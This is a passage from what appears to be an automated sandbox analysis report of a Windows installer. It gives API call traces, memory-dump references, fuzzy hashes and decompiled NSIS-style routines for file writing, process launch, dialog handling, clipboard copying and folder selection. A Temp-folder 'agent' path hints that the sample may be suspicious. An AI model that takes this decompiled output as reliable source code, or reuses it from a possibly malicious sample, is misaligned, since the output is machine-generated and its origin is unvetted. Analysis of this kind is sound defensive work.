                                                                                                                                    APIs
                                                                                                                                    • WriteFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,004165B0,00415440,004032E2,00415440,004165B0,0040B880,0041D440,00004000,?,00000000,0040310C), ref: 00405DBA
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileWrite
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                    • Opcode ID: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                                                                                                                                    • Instruction ID: 7b60e7d2bda0d683959e4e11deb6a35caf3210c0b79bbd48d176854978c937ac
                                                                                                                                    • Opcode Fuzzy Hash: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                                                                                                                                    • Instruction Fuzzy Hash: 29E0863221075AABCF115E508C04AEB3B6CEF00350F108433F914E2090D230E8108BA8
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00403361(long _a4) {
                                                                                                                                    				long _t2;
                                                                                                                                    
                                                                                                                                    				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                                                                                                    				return _t2;
                                                                                                                                    			}





                                                                                                                                    APIs
                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403061,?), ref: 0040336F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FilePointer
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                    • Opcode ID: af556f1437a27586b8d302be8c6d190c2fb2fb51029204f11d8d070fc2108142
                                                                                                                                    • Instruction ID: 81fdcbbc46e9ac73494c3809a02cbb86869920566b24394b282a4516d046c7b0
                                                                                                                                    • Opcode Fuzzy Hash: af556f1437a27586b8d302be8c6d190c2fb2fb51029204f11d8d070fc2108142
                                                                                                                                    • Instruction Fuzzy Hash: 32B01231140300BFDA214F00DF09F057B21AB90700F10C034B384780F086711075EB0D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 78%
                                                                                                                                    			E00401F48(void* __ecx) {
                                                                                                                                    				void* _t8;
                                                                                                                                    				void* _t12;
                                                                                                                                    				void* _t14;
                                                                                                                                    				void* _t16;
                                                                                                                                    				void* _t17;
                                                                                                                                    				void* _t20;
                                                                                                                                    				void* _t22;
                                                                                                                                    
                                                                                                                                    				_t16 = __ecx;
                                                                                                                                    				_t19 = E00402B2C(_t14);
                                                                                                                                    				E0040528D(0xffffffeb, _t6);
                                                                                                                                    				_t8 = E00405805(_t19); // executed
                                                                                                                                    				_t20 = _t8;
                                                                                                                                    				if(_t20 == _t14) {
                                                                                                                                    					 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                                                                                    				} else {
                                                                                                                                    					if( *((intOrPtr*)(_t22 - 0x2c)) != _t14) {
                                                                                                                                    						_t12 = E00406573(_t16, _t20); // executed
                                                                                                                                    						if( *((intOrPtr*)(_t22 - 0x30)) < _t14) {
                                                                                                                                    							if(_t12 != _t14) {
                                                                                                                                    								 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                                                                                    							}
                                                                                                                                    						} else {
                                                                                                                                    							E004060C4(_t17, _t12);
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					_push(_t20);
                                                                                                                                    					CloseHandle();
                                                                                                                                    				}
                                                                                                                                    				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t22 - 4));
                                                                                                                                    				return 0;
                                                                                                                                    			}











                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0040528D: lstrlenA.KERNEL32(0042A078,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000,?), ref: 004052C6
                                                                                                                                      • Part of subcall function 0040528D: lstrlenA.KERNEL32(00402DEC,0042A078,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000), ref: 004052D6
                                                                                                                                      • Part of subcall function 0040528D: lstrcatA.KERNEL32(0042A078,00402DEC,00402DEC,0042A078,00000000,00000000,00000000), ref: 004052E9
                                                                                                                                      • Part of subcall function 0040528D: SetWindowTextA.USER32(0042A078,0042A078), ref: 004052FB
                                                                                                                                      • Part of subcall function 0040528D: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405321
                                                                                                                                      • Part of subcall function 0040528D: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040533B
                                                                                                                                      • Part of subcall function 0040528D: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405349
                                                                                                                                      • Part of subcall function 00405805: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C0A0,Error launching installer), ref: 0040582E
                                                                                                                                      • Part of subcall function 00405805: CloseHandle.KERNEL32(?), ref: 0040583B
                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F8D
                                                                                                                                      • Part of subcall function 00406573: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406584
                                                                                                                                      • Part of subcall function 00406573: GetExitCodeProcess.KERNELBASE ref: 004065A6
                                                                                                                                      • Part of subcall function 004060C4: wsprintfA.USER32 ref: 004060D1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2972824698-0
                                                                                                                                    • Opcode ID: df980fb5c03f338f106cd6e0037e4a477a16ca569a7aca04030e70ad4a59cb50
                                                                                                                                    • Instruction ID: 09bfed3a8864f0742b6d01e661b087d633fc871929b21651a2f30fa3afb995fb
                                                                                                                                    • Opcode Fuzzy Hash: df980fb5c03f338f106cd6e0037e4a477a16ca569a7aca04030e70ad4a59cb50
                                                                                                                                    • Instruction Fuzzy Hash: 61F09072A05111ABCB21BFA59A848EF72A8AF41314B11427FE901B32D1C77C49469ABE
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Non-executed Functions

                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E004053CB(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                                                                                    				struct HWND__* _v8;
                                                                                                                                    				struct tagRECT _v24;
                                                                                                                                    				void* _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				int _v40;
                                                                                                                                    				int _v44;
                                                                                                                                    				signed int _v48;
                                                                                                                                    				int _v52;
                                                                                                                                    				void* _v56;
                                                                                                                                    				void* _v64;
                                                                                                                                    				void* __ebx;
                                                                                                                                    				void* __edi;
                                                                                                                                    				void* __esi;
                                                                                                                                    				struct HWND__* _t87;
                                                                                                                                    				struct HWND__* _t89;
                                                                                                                                    				long _t90;
                                                                                                                                    				int _t95;
                                                                                                                                    				int _t96;
                                                                                                                                    				long _t99;
                                                                                                                                    				void* _t102;
                                                                                                                                    				intOrPtr _t124;
                                                                                                                                    				struct HWND__* _t128;
                                                                                                                                    				int _t150;
                                                                                                                                    				int _t153;
                                                                                                                                    				long _t157;
                                                                                                                                    				struct HWND__* _t161;
                                                                                                                                    				struct HMENU__* _t163;
                                                                                                                                    				long _t165;
                                                                                                                                    				void* _t166;
                                                                                                                                    				char* _t167;
                                                                                                                                    				char* _t168;
                                                                                                                                    				int _t169;
                                                                                                                                    
                                                                                                                                    				_t87 =  *0x42ec04; // 0x0
                                                                                                                                    				_t157 = _a8;
                                                                                                                                    				_t150 = 0;
                                                                                                                                    				_v8 = _t87;
                                                                                                                                    				if(_t157 != 0x110) {
                                                                                                                                    					__eflags = _t157 - 0x405;
                                                                                                                                    					if(_t157 == 0x405) {
                                                                                                                                    						CloseHandle(CreateThread(0, 0, E0040535F, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
                                                                                                                                    					}
                                                                                                                                    					__eflags = _t157 - 0x111;
                                                                                                                                    					if(_t157 != 0x111) {
                                                                                                                                    						L17:
                                                                                                                                    						__eflags = _t157 - 0x404;
                                                                                                                                    						if(_t157 != 0x404) {
                                                                                                                                    							L25:
                                                                                                                                    							__eflags = _t157 - 0x7b;
                                                                                                                                    							if(_t157 != 0x7b) {
                                                                                                                                    								goto L20;
                                                                                                                                    							}
                                                                                                                                    							_t89 = _v8;
                                                                                                                                    							__eflags = _a12 - _t89;
                                                                                                                                    							if(_a12 != _t89) {
                                                                                                                                    								goto L20;
                                                                                                                                    							}
                                                                                                                                    							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
                                                                                                                                    							__eflags = _t90 - _t150;
                                                                                                                                    							_a12 = _t90;
                                                                                                                                    							if(_t90 <= _t150) {
                                                                                                                                    								L36:
                                                                                                                                    								return 0;
                                                                                                                                    							}
                                                                                                                                    							_t163 = CreatePopupMenu();
                                                                                                                                    							AppendMenuA(_t163, _t150, 1, E00406188(_t150, _t157, _t163, _t150, 0xffffffe1));
                                                                                                                                    							_t95 = _a16;
                                                                                                                                    							__eflags = _a16 - 0xffffffff;
                                                                                                                                    							_t153 = _a16 >> 0x10;
                                                                                                                                    							if(_a16 == 0xffffffff) {
                                                                                                                                    								GetWindowRect(_v8,  &_v24);
                                                                                                                                    								_t95 = _v24.left;
                                                                                                                                    								_t153 = _v24.top;
                                                                                                                                    							}
                                                                                                                                    							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
                                                                                                                                    							__eflags = _t96 - 1;
                                                                                                                                    							if(_t96 == 1) {
                                                                                                                                    								_t165 = 1;
                                                                                                                                    								__eflags = 1;
                                                                                                                                    								_v56 = _t150;
                                                                                                                                    								_v44 = 0x42a898;
                                                                                                                                    								_v40 = 0x1000;
                                                                                                                                    								_a4 = _a12;
                                                                                                                                    								do {
                                                                                                                                    									_a4 = _a4 - 1;
                                                                                                                                    									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
                                                                                                                                    									__eflags = _a4 - _t150;
                                                                                                                                    									_t165 = _t165 + _t99 + 2;
                                                                                                                                    								} while (_a4 != _t150);
                                                                                                                                    								OpenClipboard(_t150);
                                                                                                                                    								EmptyClipboard();
                                                                                                                                    								_t102 = GlobalAlloc(0x42, _t165);
                                                                                                                                    								_a4 = _t102;
                                                                                                                                    								_t166 = GlobalLock(_t102);
                                                                                                                                    								do {
                                                                                                                                    									_v44 = _t166;
                                                                                                                                    									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
                                                                                                                                    									 *_t167 = 0xd;
                                                                                                                                    									_t168 = _t167 + 1;
                                                                                                                                    									 *_t168 = 0xa;
                                                                                                                                    									_t166 = _t168 + 1;
                                                                                                                                    									_t150 = _t150 + 1;
                                                                                                                                    									__eflags = _t150 - _a12;
                                                                                                                                    								} while (_t150 < _a12);
                                                                                                                                    								GlobalUnlock(_a4);
                                                                                                                                    								SetClipboardData(1, _a4);
                                                                                                                                    								CloseClipboard();
                                                                                                                                    							}
                                                                                                                                    							goto L36;
                                                                                                                                    						}
                                                                                                                                    						__eflags =  *0x42ebec - _t150; // 0x1
                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                    							ShowWindow( *0x42f428, 8);
                                                                                                                                    							__eflags =  *0x42f4cc - _t150;
                                                                                                                                    							if( *0x42f4cc == _t150) {
                                                                                                                                    								E0040528D( *((intOrPtr*)( *0x42a070 + 0x34)), _t150);
                                                                                                                                    							}
                                                                                                                                    							E004041CD(1);
                                                                                                                                    							goto L25;
                                                                                                                                    						}
                                                                                                                                    						 *0x429c68 = 2;
                                                                                                                                    						E004041CD(0x78);
                                                                                                                                    						goto L20;
                                                                                                                                    					} else {
                                                                                                                                    						__eflags = _a12 - 0x403;
                                                                                                                                    						if(_a12 != 0x403) {
                                                                                                                                    							L20:
                                                                                                                                    							return E0040425B(_t157, _a12, _a16);
                                                                                                                                    						}
                                                                                                                                    						ShowWindow( *0x42ebf0, _t150);
                                                                                                                                    						ShowWindow(_v8, 8);
                                                                                                                                    						E00404229(_v8);
                                                                                                                                    						goto L17;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				_v48 = _v48 | 0xffffffff;
                                                                                                                                    				_v36 = _v36 | 0xffffffff;
                                                                                                                                    				_t169 = 2;
                                                                                                                                    				_v56 = _t169;
                                                                                                                                    				_v52 = 0;
                                                                                                                                    				_v44 = 0;
                                                                                                                                    				_v40 = 0;
                                                                                                                                    				asm("stosd");
                                                                                                                                    				asm("stosd");
                                                                                                                                    				_t124 =  *0x42f434;
                                                                                                                                    				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
                                                                                                                                    				_a8 =  *((intOrPtr*)(_t124 + 0x60));
                                                                                                                                    				 *0x42ebf0 = GetDlgItem(_a4, 0x403);
                                                                                                                                    				 *0x42ebe8 = GetDlgItem(_a4, 0x3ee);
                                                                                                                                    				_t128 = GetDlgItem(_a4, 0x3f8);
                                                                                                                                    				 *0x42ec04 = _t128;
                                                                                                                                    				_v8 = _t128;
                                                                                                                                    				E00404229( *0x42ebf0);
                                                                                                                                    				 *0x42ebf4 = E00404B1A(4);
                                                                                                                                    				 *0x42ec0c = 0;
                                                                                                                                    				GetClientRect(_v8,  &_v24);
                                                                                                                                    				_v48 = _v24.right - GetSystemMetrics(_t169);
                                                                                                                                    				SendMessageA(_v8, 0x101b, 0,  &_v56);
                                                                                                                                    				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                                                                                                                                    				if(_a12 >= 0) {
                                                                                                                                    					SendMessageA(_v8, 0x1001, 0, _a12);
                                                                                                                                    					SendMessageA(_v8, 0x1026, 0, _a12);
                                                                                                                                    				}
                                                                                                                                    				if(_a8 >= _t150) {
                                                                                                                                    					SendMessageA(_v8, 0x1024, _t150, _a8);
                                                                                                                                    				}
                                                                                                                                    				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                                                                    				_push(0x1b);
                                                                                                                                    				E004041F4(_a4);
                                                                                                                                    				if(( *0x42f43c & 0x00000003) != 0) {
                                                                                                                                    					ShowWindow( *0x42ebf0, _t150);
                                                                                                                                    					if(( *0x42f43c & 0x00000002) != 0) {
                                                                                                                                    						 *0x42ebf0 = _t150;
                                                                                                                                    					} else {
                                                                                                                                    						ShowWindow(_v8, 8);
                                                                                                                                    					}
                                                                                                                                    					E00404229( *0x42ebe8);
                                                                                                                                    				}
                                                                                                                                    				_t161 = GetDlgItem(_a4, 0x3ec);
                                                                                                                                    				SendMessageA(_t161, 0x401, _t150, 0x75300000);
                                                                                                                                    				if(( *0x42f43c & 0x00000004) != 0) {
                                                                                                                                    					SendMessageA(_t161, 0x409, _t150, _a8);
                                                                                                                                    					SendMessageA(_t161, 0x2001, _t150, _a12);
                                                                                                                                    				}
                                                                                                                                    				goto L36;
                                                                                                                                    			}




































                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32 ref: 0040542A
                                                                                                                                    • GetDlgItem.USER32 ref: 00405439
                                                                                                                                    • GetClientRect.USER32 ref: 00405476
                                                                                                                                    • GetSystemMetrics.USER32 ref: 0040547D
                                                                                                                                    • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040549E
                                                                                                                                    • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004054AF
                                                                                                                                    • SendMessageA.USER32(?,00001001,00000000,?), ref: 004054C2
                                                                                                                                    • SendMessageA.USER32(?,00001026,00000000,?), ref: 004054D0
                                                                                                                                    • SendMessageA.USER32(?,00001024,00000000,?), ref: 004054E3
                                                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405505
                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405519
                                                                                                                                    • GetDlgItem.USER32 ref: 0040553A
                                                                                                                                    • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040554A
                                                                                                                                    • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405563
                                                                                                                                    • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040556F
                                                                                                                                    • GetDlgItem.USER32 ref: 00405448
                                                                                                                                      • Part of subcall function 00404229: SendMessageA.USER32(00000028,?,00000001,00404059), ref: 00404237
                                                                                                                                    • GetDlgItem.USER32 ref: 0040558B
                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000535F,00000000), ref: 00405599
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004055A0
                                                                                                                                    • ShowWindow.USER32(00000000), ref: 004055C3
                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 004055CA
                                                                                                                                    • ShowWindow.USER32(00000008), ref: 00405610
                                                                                                                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405644
                                                                                                                                    • CreatePopupMenu.USER32 ref: 00405655
                                                                                                                                    • AppendMenuA.USER32 ref: 0040566A
                                                                                                                                    • GetWindowRect.USER32 ref: 0040568A
                                                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056A3
                                                                                                                                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004056DF
                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 004056EF
                                                                                                                                    • EmptyClipboard.USER32 ref: 004056F5
                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,?), ref: 004056FE
                                                                                                                                    • GlobalLock.KERNEL32 ref: 00405708
                                                                                                                                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040571C
                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405735
                                                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 00405740
                                                                                                                                    • CloseClipboard.USER32 ref: 00405746
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 590372296-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 78%
                                                                                                                                    			E00404686(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				long _v16;
                                                                                                                                    				long _v20;
                                                                                                                                    				long _v24;
                                                                                                                                    				char _v28;
                                                                                                                                    				intOrPtr _v32;
                                                                                                                                    				long _v36;
                                                                                                                                    				char _v40;
                                                                                                                                    				unsigned int _v44;
                                                                                                                                    				signed int _v48;
                                                                                                                                    				CHAR* _v56;
                                                                                                                                    				intOrPtr _v60;
                                                                                                                                    				intOrPtr _v64;
                                                                                                                                    				intOrPtr _v68;
                                                                                                                                    				CHAR* _v72;
                                                                                                                                    				void _v76;
                                                                                                                                    				struct HWND__* _v80;
                                                                                                                                    				void* __ebx;
                                                                                                                                    				void* __edi;
                                                                                                                                    				void* __esi;
                                                                                                                                    				intOrPtr _t82;
                                                                                                                                    				long _t87;
                                                                                                                                    				signed char* _t89;
                                                                                                                                    				void* _t95;
                                                                                                                                    				signed int _t96;
                                                                                                                                    				int _t109;
                                                                                                                                    				signed char _t114;
                                                                                                                                    				signed int _t118;
                                                                                                                                    				struct HWND__** _t122;
                                                                                                                                    				intOrPtr* _t138;
                                                                                                                                    				CHAR* _t146;
                                                                                                                                    				intOrPtr _t147;
                                                                                                                                    				unsigned int _t150;
                                                                                                                                    				signed int _t152;
                                                                                                                                    				unsigned int _t156;
                                                                                                                                    				signed int _t158;
                                                                                                                                    				signed int* _t159;
                                                                                                                                    				signed char* _t160;
                                                                                                                                    				struct HWND__* _t165;
                                                                                                                                    				struct HWND__* _t166;
                                                                                                                                    				int _t168;
                                                                                                                                    				unsigned int _t197;
                                                                                                                                    
                                                                                                                                    				_t156 = __edx;
                                                                                                                                    				_t82 =  *0x42a070;
                                                                                                                                    				_v32 = _t82;
                                                                                                                                    				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x430000;
                                                                                                                                    				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                                                                                                    				if(_a8 == 0x40b) {
                                                                                                                                    					E00405866(0x3fb, _t146);
                                                                                                                                    					E004063D0(_t146);
                                                                                                                                    				}
                                                                                                                                    				_t166 = _a4;
                                                                                                                                    				if(_a8 != 0x110) {
                                                                                                                                    					L8:
                                                                                                                                    					if(_a8 != 0x111) {
                                                                                                                                    						L20:
                                                                                                                                    						if(_a8 == 0x40f) {
                                                                                                                                    							L22:
                                                                                                                                    							_v8 = _v8 & 0x00000000;
                                                                                                                                    							_v12 = _v12 & 0x00000000;
                                                                                                                                    							E00405866(0x3fb, _t146);
                                                                                                                                    							if(E00405BEC(_t185, _t146) == 0) {
                                                                                                                                    								_v8 = 1;
                                                                                                                                    							}
                                                                                                                                    							E00406166(0x429868, _t146);
                                                                                                                                    							_t87 = E004064FE(1);
                                                                                                                                    							_v16 = _t87;
                                                                                                                                    							if(_t87 == 0) {
                                                                                                                                    								L30:
                                                                                                                                    								E00406166(0x429868, _t146);
                                                                                                                                    								_t89 = E00405B97(0x429868);
                                                                                                                                    								_t158 = 0;
                                                                                                                                    								if(_t89 != 0) {
                                                                                                                                    									 *_t89 =  *_t89 & 0x00000000;
                                                                                                                                    								}
                                                                                                                                    								if(GetDiskFreeSpaceA(0x429868,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                                                                                                    									goto L35;
                                                                                                                                    								} else {
                                                                                                                                    									_t168 = 0x400;
                                                                                                                                    									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                                                                                                    									asm("cdq");
                                                                                                                                    									_v48 = _t109;
                                                                                                                                    									_v44 = _t156;
                                                                                                                                    									_v12 = 1;
                                                                                                                                    									goto L36;
                                                                                                                                    								}
                                                                                                                                    							} else {
                                                                                                                                    								_t159 = 0;
                                                                                                                                    								if(0 == 0x429868) {
                                                                                                                                    									goto L30;
                                                                                                                                    								} else {
                                                                                                                                    									goto L26;
                                                                                                                                    								}
                                                                                                                                    								while(1) {
                                                                                                                                    									L26:
                                                                                                                                    									_t114 = _v16(0x429868,  &_v48,  &_v28,  &_v40);
                                                                                                                                    									if(_t114 != 0) {
                                                                                                                                    										break;
                                                                                                                                    									}
                                                                                                                                    									if(_t159 != 0) {
                                                                                                                                    										 *_t159 =  *_t159 & _t114;
                                                                                                                                    									}
                                                                                                                                    									_t160 = E00405B45(0x429868);
                                                                                                                                    									 *_t160 =  *_t160 & 0x00000000;
                                                                                                                                    									_t159 = _t160 - 1;
                                                                                                                                    									 *_t159 = 0x5c;
                                                                                                                                    									if(_t159 != 0x429868) {
                                                                                                                                    										continue;
                                                                                                                                    									} else {
                                                                                                                                    										goto L30;
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    								_t150 = _v44;
                                                                                                                                    								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                                                                                                    								_v44 = _t150 >> 0xa;
                                                                                                                                    								_v12 = 1;
                                                                                                                                    								_t158 = 0;
                                                                                                                                    								__eflags = 0;
                                                                                                                                    								L35:
                                                                                                                                    								_t168 = 0x400;
                                                                                                                                    								L36:
                                                                                                                                    								_t95 = E00404B1A(5);
                                                                                                                                    								if(_v12 != _t158) {
                                                                                                                                    									_t197 = _v44;
                                                                                                                                    									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                                                                                                    										_v8 = 2;
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    								_t147 =  *0x42ebfc; // 0x671d5f
                                                                                                                                    								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
                                                                                                                                    									E00404B02(0x3ff, 0xfffffffb, _t95);
                                                                                                                                    									if(_v12 == _t158) {
                                                                                                                                    										SetDlgItemTextA(_a4, _t168, 0x429858);
                                                                                                                                    									} else {
                                                                                                                                    										E00404A3D(_t168, 0xfffffffc, _v48, _v44);
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    								_t96 = _v8;
                                                                                                                                    								 *0x42f4e4 = _t96;
                                                                                                                                    								if(_t96 == _t158) {
                                                                                                                                    									_v8 = E0040140B(7);
                                                                                                                                    								}
                                                                                                                                    								if(( *(_v32 + 0x14) & _t168) != 0) {
                                                                                                                                    									_v8 = _t158;
                                                                                                                                    								}
                                                                                                                                    								E00404216(0 | _v8 == _t158);
                                                                                                                                    								if(_v8 == _t158 &&  *0x42a888 == _t158) {
                                                                                                                                    									E004045DF();
                                                                                                                                    								}
                                                                                                                                    								 *0x42a888 = _t158;
                                                                                                                                    								goto L53;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						_t185 = _a8 - 0x405;
                                                                                                                                    						if(_a8 != 0x405) {
                                                                                                                                    							goto L53;
                                                                                                                                    						}
                                                                                                                                    						goto L22;
                                                                                                                                    					}
                                                                                                                                    					_t118 = _a12 & 0x0000ffff;
                                                                                                                                    					if(_t118 != 0x3fb) {
                                                                                                                                    						L12:
                                                                                                                                    						if(_t118 == 0x3e9) {
                                                                                                                                    							_t152 = 7;
                                                                                                                                    							memset( &_v76, 0, _t152 << 2);
                                                                                                                                    							_v80 = _t166;
                                                                                                                                    							_v72 = 0x42a898;
                                                                                                                                    							_v60 = E004049D7;
                                                                                                                                    							_v56 = _t146;
                                                                                                                                    							_v68 = E00406188(_t146, 0x42a898, _t166, 0x429c70, _v12);
                                                                                                                                    							_t122 =  &_v80;
                                                                                                                                    							_v64 = 0x41;
                                                                                                                                    							__imp__SHBrowseForFolderA(_t122);
                                                                                                                                    							if(_t122 == 0) {
                                                                                                                                    								_a8 = 0x40f;
                                                                                                                                    							} else {
                                                                                                                                    								__imp__CoTaskMemFree(_t122);
                                                                                                                                    								E00405AFE(_t146);
                                                                                                                                    								_t125 =  *((intOrPtr*)( *0x42f434 + 0x11c));
                                                                                                                                    								if( *((intOrPtr*)( *0x42f434 + 0x11c)) != 0 && _t146 == 0x435400) {
                                                                                                                                    									E00406188(_t146, 0x42a898, _t166, 0, _t125);
                                                                                                                                    									if(lstrcmpiA(0x42e3c0, 0x42a898) != 0) {
                                                                                                                                    										lstrcatA(_t146, 0x42e3c0);
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    								 *0x42a888 =  *0x42a888 + 1;
                                                                                                                                    								SetDlgItemTextA(_t166, 0x3fb, _t146);
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						goto L20;
                                                                                                                                    					}
                                                                                                                                    					if(_a12 >> 0x10 != 0x300) {
                                                                                                                                    						goto L53;
                                                                                                                                    					}
                                                                                                                                    					_a8 = 0x40f;
                                                                                                                                    					goto L12;
                                                                                                                                    				} else {
                                                                                                                                    					_t165 = GetDlgItem(_t166, 0x3fb);
                                                                                                                                    					if(E00405B6B(_t146) != 0 && E00405B97(_t146) == 0) {
                                                                                                                                    						E00405AFE(_t146);
                                                                                                                                    					}
                                                                                                                                    					 *0x42ebf8 = _t166;
                                                                                                                                    					SetWindowTextA(_t165, _t146);
                                                                                                                                    					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                                                                                    					_push(1);
                                                                                                                                    					E004041F4(_t166);
                                                                                                                                    					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                                                                    					_push(0x14);
                                                                                                                                    					E004041F4(_t166);
                                                                                                                                    					E00404229(_t165);
                                                                                                                                    					_t138 = E004064FE(7);
                                                                                                                                    					if(_t138 == 0) {
                                                                                                                                    						L53:
                                                                                                                                    						return E0040425B(_a8, _a12, _a16);
                                                                                                                                    					} else {
                                                                                                                                    						 *_t138(_t165, 1);
                                                                                                                                    						goto L8;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    			}














































                                                                                                                                    0x004049c2
                                                                                                                                    0x004049d4
                                                                                                                                    0x00404736
                                                                                                                                    0x00404739
                                                                                                                                    0x00000000
                                                                                                                                    0x00404739
                                                                                                                                    0x00404730

                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32 ref: 004046D5
                                                                                                                                    • SetWindowTextA.USER32(00000000,?), ref: 004046FF
                                                                                                                                    • SHBrowseForFolderA.SHELL32(?,00429C70,?), ref: 004047B0
                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 004047BB
                                                                                                                                    • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent,0042A898,00000000,?,?), ref: 004047ED
